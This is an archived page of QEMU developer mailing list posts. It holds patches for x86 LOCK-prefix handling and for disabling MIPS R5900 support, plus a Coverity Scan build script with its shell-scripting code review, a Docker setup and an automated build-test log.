>  1 file changed, 20 insertions(+), 15 deletions(-)
>
> diff --git a/target/i386/translate.c b/target/i386/translate.c
> index f8bc7680af..0dd5fbe45c 100644
> --- a/target/i386/translate.c
> +++ b/target/i386/translate.c
> @@ -1268,10 +1268,30 @@ static void gen_helper_fp_arith_STN_ST0(int op, int 
> opreg)
>  }
>  }
>
> +static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
> +{
> +gen_update_cc_op(s);
> +gen_jmp_im(s, cur_eip);
> +gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
> +s->base.is_jmp = DISAS_NORETURN;
> +}
> +
> +/* Generate #UD for the current instruction.  The assumption here is that
> +   the instruction is known, but it isn't allowed in the current cpu mode.  
> */
> +static void gen_illegal_opcode(DisasContext *s)
> +{
> +gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
> +}
> +
>  /* if d == OR_TMP0, it means memory operand (address in A0) */
>  static void gen_op(DisasContext *s1, int op, TCGMemOp ot, int d)
>  {
>  if (d != OR_TMP0) {
> +if (s1->prefix & PREFIX_LOCK) {
> +/* Lock prefix when destination is not memory.  */
> +gen_illegal_opcode(s1);
> +return;
> +}
>  gen_op_mov_v_reg(s1, ot, s1->T0, d);
>  } else if (!(s1->prefix & PREFIX_LOCK)) {
>  gen_op_ld_v(s1, ot, s1->T0, s1->A0);
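Review bot: The new `if (s1->prefix & PREFIX_LOCK)` check at the top of gen_op covers only the register-destination path of this one helper, and the commit message itself says other LOCK-prefix checks remain missing; a short comment at the check, `/* TODO: other LOCK-prefixed opcodes still lack this #UD check */`, keeps that scope visible to later readers instead of only in the commit log. The preceding part of the hunk is a pure relocation of gen_exception and gen_illegal_opcode to precede gen_op (the second hunk deletes the originals unchanged), so nothing there needs re-review. gen_op's body continues past the hunk, and the same hunk appears again in the original posting of this patch further down the page.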
> @@ -2469,21 +2489,6 @@ static void gen_leave(DisasContext *s)
>  gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1);
>  }
>
> -static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
> -{
> -gen_update_cc_op(s);
> -gen_jmp_im(s, cur_eip);
> -gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
> -s->base.is_jmp = DISAS_NORETURN;
> -}
> -
> -/* Generate #UD for the current instruction.  The assumption here is that
> -   the instruction is known, but it isn't allowed in the current cpu mode.  
> */
> -static void gen_illegal_opcode(DisasContext *s)
> -{
> -gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
> -}
> -
>  /* Similarly, except that the assumption here is that we don't decode
> the instruction at all -- either a missing opcode, an unimplemented
> feature, or just a bogus instruction stream.  */
> --
> 2.17.2
>



Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

2018-11-13 Thread Eric Blake

On 11/13/18 1:21 PM, Peter Maydell wrote:



set -e...


+check_upload_permissions() {



...and shell functions do NOT intuitively do what you would think. It's
almost always better to use explicit error checking than to rely on set -e
as a crutch, because then you don't get surprises.


I think we had this conversation with last year's version
of this script too :-)  As you say, the use of functions
makes it maybe better to use explicit error checking -- but
is there a standard syntax for that that doesn't make
basic
  foo
  bar
  baz
"do these things in order" code look weird and require special care?
At least with set -e you do get error checking, whereas scripts without
it tend to just plough on regardless (look at configure, which doesn't
use set -e but doesn't have explicit checking either).


I've seen both:

foo &&
bar &&
baz

and

foo || fail
bar || fail
baz || fail

for some variation of a 'fail' function.  But yeah, once you start 
having to worry about checking everything yourself (or realizing which 
lines don't need checking), you find out how much of a crutch 'set -e' 
tries to be, and then wonder how it ever worked (for the number of cases 
where 'set -e' does not actually catch failure, and cannot be re-enabled 
in smaller scopes).



+TOOLBIN="$(cd "$COVERITY_TOOL_BASE" && echo
$(pwd)/coverity_tool/cov-analysis-*/bin)"



If $CDPATH is set and $COVERITY_TOOL_BASE does not contain /, this could
result in garbage being prepended to TOOLBIN as output from the 'cd'. Also,
$PWD is nicer than $(pwd); but are you sure the glob in cov-analysis-* won't
select too many files?


The glob is not great, but it is necessary to make the script
robust over new versions of the tools, which put the version
number in the cov-analysis-whatever directory name. If
we do ever get more than one file then the "test -x" below
will fail, and we'll be able to investigate and fix up the script.


Yeah, I think you're okay on that front.



CDPATH sounds like a horrific misfeature designed for breaking
scripts, so I'm not very interested in trying to work around it.
We don't seem to worry about this in configure either.
(I suppose we could just unset it at the start of the script.)


Autoconf 'configure' scripts do just that (unset CDPATH up front).  If 
someone ever complains that it actually broke for them, we'll make the 
fix; until then, I can live with the risk.


--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org



Re: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

2018-11-13 Thread no-reply
Hi,

This series failed docker-mingw@fedora build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: 20181112214224.31560-1-cont...@steffen-goertz.de
Subject: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-mingw@fedora SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
From https://github.com/patchew-project/qemu
   6ff1446989..cb968d275c  master -> master
 * [new tag]   
patchew/1542135956-3780-1-git-send-email-aleksandar.marko...@rt-rk.com -> 
patchew/1542135956-3780-1-git-send-email-aleksandar.marko...@rt-rk.com
 t [tag update]patchew/20181113165247.4806-1-sa...@linux.intel.com 
-> patchew/20181113165247.4806-1-sa...@linux.intel.com
 * [new tag]   
patchew/20181113180154.17903-1-richard.hender...@linaro.org -> 
patchew/20181113180154.17903-1-richard.hender...@linaro.org
 * [new tag]   
patchew/20181113184641.4492-1-peter.mayd...@linaro.org -> 
patchew/20181113184641.4492-1-peter.mayd...@linaro.org
Switched to a new branch 'test'
187f1fc84c arm: Add Clock peripheral stub to NRF51 SOC
46c8bafa10 tests/microbit-test: Add Tests for nRF51 Timer
4a8e69516c arm: Instantiate NRF51 Timers
48bafc25c5 hw/timer/nrf51_timer: Add nRF51 Timer peripheral
300ab01b3e tests/microbit-test: Add Tests for nRF51 GPIO
2d8d566dda arm: Instantiate NRF51 general purpose I/O
b5e2ea643d hw/gpio/nrf51_gpio: Add nRF51 GPIO peripheral
76a11e0531 tests: Add bbc:microbit / nRF51 test suite
00b8265b8b arm: Instantiate NRF51 special NVM's and NVMC
faacca4fcb hw/nvram/nrf51_nvm: Add nRF51 non-volatile memories
3619b14640 arm: Instantiate NRF51 random number generator
ca058f1721 hw/misc/nrf51_rng: Add NRF51 random number generator peripheral
bfbb2b5de5 arm: Add header to host common definition for nRF51 SOC peripherals
8e46d5f624 qtest: Add set_irq_in command to set IRQ/GPIO level

=== OUTPUT BEGIN ===
  BUILD   fedora
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-l04dkvb6/src'
  GEN 
/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (git://git.qemu-project.org/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (git://git.qemu.org/keycodemapdb.git) registered 
for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-mingw in qemu:fedora 
Packages installed:
SDL2-devel-2.0.8-5.fc28.x86_64
bc-1.07.1-5.fc28.x86_64
bison-3.0.4-9.fc28.x86_64
bluez-libs-devel-5.50-1.fc28.x86_64
brlapi-devel-0.6.7-19.fc28.x86_64
bzip2-1.0.6-26.fc28.x86_64
bzip2-devel-1.0.6-26.fc28.x86_64
ccache-3.4.2-2.fc28.x86_64
clang-6.0.1-1.fc28.x86_64
device-mapper-multipath-devel-0.7.4-3.git07e7bd5.fc28.x86_64
findutils-4.6.0-19.fc28.x86_64
flex-2.6.1-7.fc28.x86_64
gcc-8.1.1-5.fc28.x86_64
gcc-c++-8.1.1-5.fc28.x86_64
gettext-0.19.8.1-14.fc28.x86_64
git-2.17.1-3.fc28.x86_64
glib2-devel-2.56.1-4.fc28.x86_64
glusterfs-api-devel-4.1.2-2.fc28.x86_64
gnutls-devel-3.6.3-3.fc28.x86_64
gtk3-devel-3.22.30-1.fc28.x86_64
hostname-3.20-3.fc28.x86_64
libaio-devel-0.3.110-11.fc28.x86_64
libasan-8.1.1-5.fc28.x86_64
libattr-devel-2.4.48-3.fc28.x86_64
libcap-devel-2.25-9.fc28.x86_64
libcap-ng-devel-0.7.9-4.fc28.x86_64
libcurl-devel-7.59.0-6.fc28.x86_64
libfdt-devel-1.4.6-5.fc28.x86_64
libpng-devel-1.6.34-6.fc28.x86_64
librbd-devel-12.2.7-1.fc28.x86_64
libssh2-devel-1.8.0-7.fc28.x86_64
libubsan-8.1.1-5.fc28.x86_64
libusbx-devel-1.0.22-1.fc28.x86_64
libxml2-devel-2.9.8-4.fc28.x86_64
llvm-6.0.1-6.fc28.x86_64
lzo-devel-2.08-12.fc28.x86_64
make-4.2.1-6.fc28.x86_64
mingw32-SDL2-2.0.5-3.fc27.noarch
mingw32-bzip2-1.0.6-9.fc27.noarch
mingw32-curl-7.57.0-1.fc28.noarch
mingw32-glib2-2.56.1-1.fc28.noarch
mingw32-gmp-6.1.2-2.fc27.noarch
mingw32-gnutls-3.6.2-1.fc28.noarch
mingw32-gtk3-3.22.30-1.fc28.noarch
mingw32-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw32-libpng-1.6.29-2.fc27.noarch
mingw32-libssh2-1.8.0-3.fc27.noarch
mingw32-libtasn1-4.13-1.fc28.noarch
mingw32-nettle-3.4-1.fc28.noarch
mingw32-pixman-0.34.0-3.fc27.noarch
mingw32-pkg-config-0.28-9.fc27.x86_64
mingw64-SDL2-2.0.5-3.fc27.noarch
mingw64-bzip2-1.0.6-9.fc27.noarch
mingw64-curl-7.57.0-1.fc28.noarch
mingw64-glib2-2.56.1-1.fc28.noarch
mingw64-gmp-6.1.2-2.fc27.noarch
mingw64-gnutls-3.6.2-1.fc28.noarch

[Qemu-devel] [PATCH] target/i386: Generate #UD when applying LOCK to a register destination

2018-11-13 Thread Richard Henderson
Fixes a TCG crash due to attempting the atomic operation without
having set up the address first.  This does not attempt to fix
all of the other missing checks for LOCK.

Fixes: a7cee522f35
Fixes: https://bugs.launchpad.net/qemu/+bug/1803160
Signed-off-by: Richard Henderson 
---
 target/i386/translate.c | 35 ---
 1 file changed, 20 insertions(+), 15 deletions(-)

diff --git a/target/i386/translate.c b/target/i386/translate.c
index f8bc7680af..0dd5fbe45c 100644
--- a/target/i386/translate.c
+++ b/target/i386/translate.c
@@ -1268,10 +1268,30 @@ static void gen_helper_fp_arith_STN_ST0(int op, int 
opreg)
 }
 }
 
+static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
+{
+gen_update_cc_op(s);
+gen_jmp_im(s, cur_eip);
+gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
+s->base.is_jmp = DISAS_NORETURN;
+}
+
+/* Generate #UD for the current instruction.  The assumption here is that
+   the instruction is known, but it isn't allowed in the current cpu mode.  */
+static void gen_illegal_opcode(DisasContext *s)
+{
+gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
+}
+
 /* if d == OR_TMP0, it means memory operand (address in A0) */
 static void gen_op(DisasContext *s1, int op, TCGMemOp ot, int d)
 {
 if (d != OR_TMP0) {
+if (s1->prefix & PREFIX_LOCK) {
+/* Lock prefix when destination is not memory.  */
+gen_illegal_opcode(s1);
+return;
+}
 gen_op_mov_v_reg(s1, ot, s1->T0, d);
 } else if (!(s1->prefix & PREFIX_LOCK)) {
 gen_op_ld_v(s1, ot, s1->T0, s1->A0);
@@ -2469,21 +2489,6 @@ static void gen_leave(DisasContext *s)
 gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1);
 }
 
-static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
-{
-gen_update_cc_op(s);
-gen_jmp_im(s, cur_eip);
-gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
-s->base.is_jmp = DISAS_NORETURN;
-}
-
-/* Generate #UD for the current instruction.  The assumption here is that
-   the instruction is known, but it isn't allowed in the current cpu mode.  */
-static void gen_illegal_opcode(DisasContext *s)
-{
-gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
-}
-
 /* Similarly, except that the assumption here is that we don't decode
the instruction at all -- either a missing opcode, an unimplemented
feature, or just a bogus instruction stream.  */
-- 
2.17.2




Re: [Qemu-devel] [PATCH] target/mips: Disable R5900 support

2018-11-13 Thread Philippe Mathieu-Daudé
Hi Aleksandar,

On Tue, Nov 13, 2018 at 8:08 PM Aleksandar Markovic
 wrote:
>
> From: Aleksandar Markovic 
>
> Disable R5900 support. There are some outstanding issues related
> to ABI support and emulation accuracy, that were not understood
> well during review process. Disable to avoid backward compatibility
> issues.

Can you add:

This reverts commit ed4f49ba9bb56ebca6987b1083255daf6c89b5de.

Or

Fixes: ed4f49ba9

when applying?

>
> Signed-off-by: Aleksandar Markovic 
> ---
>  target/mips/translate_init.inc.c | 59 
> 
>  1 file changed, 59 deletions(-)
>
> diff --git a/target/mips/translate_init.inc.c 
> b/target/mips/translate_init.inc.c
> index 85da4a2..acab097 100644
> --- a/target/mips/translate_init.inc.c
> +++ b/target/mips/translate_init.inc.c
> @@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
>  .mmu_type = MMU_TYPE_R4000,
>  },
>  {
> -/*
> - * The Toshiba TX System RISC TX79 Core Architecture manual
> - *
> - * https://wiki.qemu.org/File:C790.pdf
> - *
> - * describes the C790 processor that is a follow-up to the R5900.
> - * There are a few notable differences in that the R5900 FPU
> - *
> - * - is not IEEE 754-1985 compliant,
> - * - does not implement double format, and
> - * - its machine code is nonstandard.
> - */
> -.name = "R5900",
> -.CP0_PRid = 0x2E00,
> -/* No L2 cache, icache size 32k, dcache size 32k, uncached 
> coherency. */
> -.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
> -.CP0_Status_rw_bitmask = 0xF4C79C1F,
> -#ifdef CONFIG_USER_ONLY
> -/*
> - * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and 
> LL/SC
> - * emulation. For user only, QEMU is the kernel, so we emulate the 
> traps
> - * by simply emulating the instructions directly.
> - *
> - * Note: Config1 is only used internally, the R5900 has only Config0.
> - */
> -.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
> -.CP0_LLAddr_rw_bitmask = 0x,
> -.CP0_LLAddr_shift = 4,
> -.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
> -.CP1_fcr31 = 0,
> -.CP1_fcr31_rw_bitmask = 0x0183,
> -#else
> -/*
> - * The R5900 COP1 FPU implements single-precision floating-point
> - * operations but is not entirely IEEE 754-1985 compatible. In
> - * particular,
> - *
> - * - NaN (not a number) and +/- infinities are not supported;
> - * - exception mechanisms are not fully supported;
> - * - denormalized numbers are not supported;
> - * - rounding towards nearest and +/- infinities are not supported;
> - * - computed results usually differs in the least significant bit;
> - * - saturations can differ more than the least significant bit.
> - *
> - * Since only rounding towards zero is supported, the two least
> - * significant bits of FCR31 are hardwired to 01.
> - *
> - * FPU emulation is disabled here until it is implemented.
> - *
> - * Note: Config1 is only used internally, the R5900 has only Config0.
> - */
> -.CP0_Config1 = (47 << CP0C1_MMU),
> -#endif /* !CONFIG_USER_ONLY */
> -.SEGBITS = 32,
> -.PABITS = 32,
> -.insn_flags = CPU_R5900 | ASE_MMI,
> -.mmu_type = MMU_TYPE_R4000,
> -},
> -{
>  /* A generic CPU supporting MIPS32 Release 6 ISA.
> FIXME: Support IEEE 754-2008 FP.
>Eventually this should be replaced by a real CPU model. */
> --
> 2.7.4
>
>



Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

2018-11-13 Thread Peter Maydell
On 13 November 2018 at 19:06, Eric Blake  wrote:
> On 11/13/18 12:46 PM, Peter Maydell wrote:
>>
>> Add a new script to automate the process of running the Coverity
>> Scan build tools and uploading the resulting tarball to the
>> website.
>>
>> This is intended eventually to be driven from Travis,
>> but it can be run locally, if you are a maintainer of the
>> QEMU project on the Coverity Scan website and have the secret
>> upload token.
>>
>> The script must be run directly on a Fedora 28 system.
>>
>> Signed-off-by: Peter Maydell 
>> ---

Thanks for the code review -- my shell scripting has some
bad habits in it.

>
>> +++ b/scripts/coverity-scan/run-coverity-scan
>> @@ -0,0 +1,292 @@
>> +#!/bin/sh -e
>
>
> set -e...
>
>> +check_upload_permissions() {
>
>
> ...and shell functions do NOT intuitively do what you would think. It's
> almost always better to use explicit error checking than to rely on set -e
> as a crutch, because then you don't get surprises.

I think we had this conversation with last year's version
of this script too :-)  As you say, the use of functions
makes it maybe better to use explicit error checking -- but
is there a standard syntax for that that doesn't make
basic
 foo
 bar
 baz
"do these things in order" code look weird and require special care?
At least with set -e you do get error checking, whereas scripts without
it tend to just plough on regardless (look at configure, which doesn't
use set -e but doesn't have explicit checking either).

>> +# Check whether we can do an upload to the server; will exit the
>> script
>> +# with status 1 if the check failed (usually a bad token);
>> +# will exit the script with status 0 if the check indicated that we
>> +# can't upload yet (ie we are at quota)
>> +# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
>> +
>> +echo "Checking upload permissions..."
>> +
>> +if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted
>> --post-data "token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
>> +echo "Coverity Scan API access denied: bad token?"
>> +exit 1
>> +fi
>> +
>> +# Really up_perm is a JSON response with either
>> +# {upload_permitted:true} or {next_upload_permitted_at:}
>> +# We do some hacky string parsing instead of properly parsing it.
>> +case "$up_perm" in
>> +*upload_permitted*true*)
>> +echo "Coverity Scan: upload permitted"
>> +;;
>> +*next_upload_permitted_at*)
>> +if [ "$DRYRUN" = yes ]; then
>> +echo "Coverity Scan: upload quota reached; stopping here"
>> +# Exit success as this isn't a build error.
>> +exit 0
>> +else
>> +echo "Coverity Scan: upload quota reached, continuing dry
>> run"
>> +fi
>
>
> Did you get the logic backwards on this if?  Based on the error message, I
> was guessing the intended condition was [ "$DRYRUN" != yes ]

Yes, I did (I flipped the way I was doing checks from "unset
means no" to "check if it is yes", and didn't get it right;
I caught another instance of this later, but missed this one.)

>> +done
>> +
>> +if [ -z "$COVERITY_TOKEN" ]; then
>> +echo "COVERITY_TOKEN environment variable not set"
>> +exit 1
>> +fi
>> +
>> +if [ -z "$COVERITY_BUILD_CMD" ]; then
>> +echo "COVERITY_BUILD_CMD: using default 'make -j8'"
>> +COVERITY_BUILD_CMD="make -j8"
>
>
> Should this query 'nproc' instead of hard-coding -j8?

Probably. Legacy of this thing developing from a local hack
into something a bit more 'production'.

>> +fi
>> +
>> +if [ -z "$COVERITY_TOOL_BASE" ]; then
>> +echo "COVERITY_TOOL_BASE: using default /tmp/coverity-tools"
>> +COVERITY_TOOL_BASE=/tmp/coverity-tools
>> +fi
>> +
>> +if [ -z "$SRCDIR" ]; then
>> +SRCDIR="$(pwd)"
>
>
> Why not save a process, and just use SRCDIR="$PWD"

I never remember that $PWD exists, because when I'm doing
things on a shell command line I always use 'pwd'. But
it would be better, yes.

>> +TOOLBIN="$(cd "$COVERITY_TOOL_BASE" && echo
>> $(pwd)/coverity_tool/cov-analysis-*/bin)"
>
>
> If $CDPATH is set and $COVERITY_TOOL_BASE does not contain /, this could
> result in garbage being prepended to TOOLBIN as output from the 'cd'. Also,
> $PWD is nicer than $(pwd); but are you sure the glob in cov-analysis-* won't
> select too many files?

The glob is not great, but it is necessary to make the script
robust over new versions of the tools, which put the version
number in the cov-analysis-whatever directory name. If
we do ever get more than one file then the "test -x" below
will fail, and we'll be able to investigate and fix up the script.

CDPATH sounds like a horrific misfeature designed for breaking
scripts, so I'm not very interested in trying to work around it.
We don't seem to worry about this in configure either.
(I suppose we could just unset it at the start of the script.)

thanks
-- PMM



[Qemu-devel] [PATCH] target/mips: Disable R5900 support

2018-11-13 Thread Aleksandar Markovic
From: Aleksandar Markovic 

Disable R5900 support. There are some outstanding issues related
to ABI support and emulation accuracy, that were not understood
well during review process. Disable to avoid backward compatibility
issues.

Signed-off-by: Aleksandar Markovic 
---
 target/mips/translate_init.inc.c | 59 
 1 file changed, 59 deletions(-)

diff --git a/target/mips/translate_init.inc.c b/target/mips/translate_init.inc.c
index 85da4a2..acab097 100644
--- a/target/mips/translate_init.inc.c
+++ b/target/mips/translate_init.inc.c
@@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
 .mmu_type = MMU_TYPE_R4000,
 },
 {
-/*
- * The Toshiba TX System RISC TX79 Core Architecture manual
- *
- * https://wiki.qemu.org/File:C790.pdf
- *
- * describes the C790 processor that is a follow-up to the R5900.
- * There are a few notable differences in that the R5900 FPU
- *
- * - is not IEEE 754-1985 compliant,
- * - does not implement double format, and
- * - its machine code is nonstandard.
- */
-.name = "R5900",
-.CP0_PRid = 0x2E00,
-/* No L2 cache, icache size 32k, dcache size 32k, uncached coherency. 
*/
-.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
-.CP0_Status_rw_bitmask = 0xF4C79C1F,
-#ifdef CONFIG_USER_ONLY
-/*
- * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and LL/SC
- * emulation. For user only, QEMU is the kernel, so we emulate the 
traps
- * by simply emulating the instructions directly.
- *
- * Note: Config1 is only used internally, the R5900 has only Config0.
- */
-.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
-.CP0_LLAddr_rw_bitmask = 0x,
-.CP0_LLAddr_shift = 4,
-.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
-.CP1_fcr31 = 0,
-.CP1_fcr31_rw_bitmask = 0x0183,
-#else
-/*
- * The R5900 COP1 FPU implements single-precision floating-point
- * operations but is not entirely IEEE 754-1985 compatible. In
- * particular,
- *
- * - NaN (not a number) and +/- infinities are not supported;
- * - exception mechanisms are not fully supported;
- * - denormalized numbers are not supported;
- * - rounding towards nearest and +/- infinities are not supported;
- * - computed results usually differs in the least significant bit;
- * - saturations can differ more than the least significant bit.
- *
- * Since only rounding towards zero is supported, the two least
- * significant bits of FCR31 are hardwired to 01.
- *
- * FPU emulation is disabled here until it is implemented.
- *
- * Note: Config1 is only used internally, the R5900 has only Config0.
- */
-.CP0_Config1 = (47 << CP0C1_MMU),
-#endif /* !CONFIG_USER_ONLY */
-.SEGBITS = 32,
-.PABITS = 32,
-.insn_flags = CPU_R5900 | ASE_MMI,
-.mmu_type = MMU_TYPE_R4000,
-},
-{
 /* A generic CPU supporting MIPS32 Release 6 ISA.
FIXME: Support IEEE 754-2008 FP.
   Eventually this should be replaced by a real CPU model. */
-- 
2.7.4




Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

2018-11-13 Thread Eric Blake

On 11/13/18 12:46 PM, Peter Maydell wrote:

Add a new script to automate the process of running the Coverity
Scan build tools and uploading the resulting tarball to the
website.

This is intended eventually to be driven from Travis,
but it can be run locally, if you are a maintainer of the
QEMU project on the Coverity Scan website and have the secret
upload token.

The script must be run directly on a Fedora 28 system.

Signed-off-by: Peter Maydell 
---



+++ b/scripts/coverity-scan/run-coverity-scan
@@ -0,0 +1,292 @@
+#!/bin/sh -e


set -e...


+check_upload_permissions() {


...and shell functions do NOT intuitively do what you would think. It's 
almost always better to use explicit error checking than to rely on set 
-e as a crutch, because then you don't get surprises.



+# Check whether we can do an upload to the server; will exit the script
+# with status 1 if the check failed (usually a bad token);
+# will exit the script with status 0 if the check indicated that we
+# can't upload yet (ie we are at quota)
+# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
+
+echo "Checking upload permissions..."
+
+if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted --post-data 
"token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
+echo "Coverity Scan API access denied: bad token?"
+exit 1
+fi
+
+# Really up_perm is a JSON response with either
+# {upload_permitted:true} or {next_upload_permitted_at:}
+# We do some hacky string parsing instead of properly parsing it.
+case "$up_perm" in
+*upload_permitted*true*)
+echo "Coverity Scan: upload permitted"
+;;
+*next_upload_permitted_at*)
+if [ "$DRYRUN" = yes ]; then
+echo "Coverity Scan: upload quota reached; stopping here"
+# Exit success as this isn't a build error.
+exit 0
+else
+echo "Coverity Scan: upload quota reached, continuing dry run"
+fi


Did you get the logic backwards on this if?  Based on the error message, 
I was guessing the intended condition was [ "$DRYRUN" != yes ]



+;;
+*)
+echo "Coverity Scan upload check: unexpected result $up_perm"
+exit 1
+;;
+esac
+}
+
+
+update_coverity_tools () {
+# Check for whether we need to download the Coverity tools
+# (either because we don't have a copy, or because it's out of date)
+# Assumes that COVERITY_TOOL_BASE, PROJTOKEN and PROJNAME are set.
+
+mkdir -p "$COVERITY_TOOL_BASE"
+cd "$COVERITY_TOOL_BASE"
+
+echo "Checking for new version of coverity build tools..."
+wget https://scan.coverity.com/download/linux64 --post-data 
"token=$PROJTOKEN=$PROJNAME=1" -O coverity_tool.md5.new
+
+if ! cmp -s coverity_tool.md5 coverity_tool.md5.new; then
+# out of date md5 or no md5: download new build tool
+# blow away the old build tool
+echo "Downloading coverity build tools..."
+rm -rf coverity_tool coverity_tool.tgz
+wget https://scan.coverity.com/download/linux64 --post-data 
"token=$PROJTOKEN=$PROJNAME" -O coverity_tool.tgz
+if ! (cat coverity_tool.md5.new; echo "  coverity_tool.tgz") | md5sum 
-c --status; then
+echo "Downloaded tarball didn't match md5sum!"
+exit 1
+fi
+# extract the new one, keeping it corralled in a 'coverity_tool' 
directory
+echo "Unpacking coverity build tools..."
+mkdir -p coverity_tool
+cd coverity_tool
+tar xf ../coverity_tool.tgz


Assumes GNU tar, with its auto-decompression. But then again, you said 
the entire script assumes Fedora 28, so that's not necessarily bad.



+cd ..
+mv coverity_tool.md5.new coverity_tool.md5


Here's an example of where 'set -e' could bite - if tar or mv fails 
(perhaps due to ENOSPC), the decision of whether the shell function 
immediately stops or continues on to the next line (without handling the 
error) is dependent on the context that the caller used when calling 
update_coverity_tools (that is, 'update_coverity_tools' and 
'update_coverity_tools || fail' behave differently).



+fi
+
+rm -f coverity_tool.md5.new
+}
+
+
+# Check user-provided environment variables and arguments
+DRYRUN=no
+UPDATE_ONLY=no
+
+while [ "$#" -ge 1 ]; do



+done
+
+if [ -z "$COVERITY_TOKEN" ]; then
+echo "COVERITY_TOKEN environment variable not set"
+exit 1
+fi
+
+if [ -z "$COVERITY_BUILD_CMD" ]; then
+echo "COVERITY_BUILD_CMD: using default 'make -j8'"
+COVERITY_BUILD_CMD="make -j8"


Should this query 'nproc' instead of hard-coding -j8?


+fi
+
+if [ -z "$COVERITY_TOOL_BASE" ]; then
+echo "COVERITY_TOOL_BASE: using default /tmp/coverity-tools"
+COVERITY_TOOL_BASE=/tmp/coverity-tools
+fi
+
+if [ -z "$SRCDIR" ]; then
+SRCDIR="$(pwd)"


Why not save a process, and just use SRCDIR="$PWD"


[Qemu-devel] [PATCH 2/2] scripts/coverity-scan: Add Docker support

2018-11-13 Thread Peter Maydell
Add support for running the Coverity Scan tools inside a Docker
container rather than directly on the host system.

Signed-off-by: Peter Maydell 
---
 scripts/coverity-scan/coverity-scan.docker | 120 +
 scripts/coverity-scan/run-coverity-scan|  58 ++
 2 files changed, 178 insertions(+)
 create mode 100644 scripts/coverity-scan/coverity-scan.docker

diff --git a/scripts/coverity-scan/coverity-scan.docker 
b/scripts/coverity-scan/coverity-scan.docker
new file mode 100644
index 000..81f69459954
--- /dev/null
+++ b/scripts/coverity-scan/coverity-scan.docker
@@ -0,0 +1,120 @@
+# syntax=docker/dockerfile:1.0.0-experimental
+#
+# Docker setup for running the "Coverity Scan" tools over the source
+# tree and uploading them to the website, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+# We do this on a fixed config (currently Fedora 28 with a known
+# set of dependencies and a configure command that enables a specific
+# set of options) so that random changes don't result in our accidentally
+# dropping some files from the scan.
+# The work of actually doing the build is handled by the
+# run-coverity-scan script.
+
+
+FROM fedora:28
+ENV PACKAGES \
+alsa-lib-devel \
+bc \
+bison \
+bluez-libs-devel \
+brlapi-devel \
+bzip2 \
+bzip2-devel \
+ccache \
+clang \
+curl \
+cyrus-sasl-devel \
+device-mapper-multipath-devel \
+findutils \
+flex \
+gcc \
+gcc-c++ \
+gettext \
+git \
+glib2-devel \
+glusterfs-api-devel \
+gnutls-devel \
+gtk3-devel \
+hostname \
+libaio-devel \
+libasan \
+libattr-devel \
+libcap-devel \
+libcap-ng-devel \
+libcurl-devel \
+libepoxy-devel \
+libfdt-devel \
+libgbm-devel \
+libiscsi-devel \
+libjpeg-devel \
+libnfs-devel \
+libpng-devel \
+librbd-devel \
+libseccomp-devel \
+libssh2-devel \
+libubsan \
+libudev-devel \
+libusbx-devel \
+libxml2-devel \
+llvm \
+lzo-devel \
+make \
+mingw32-bzip2 \
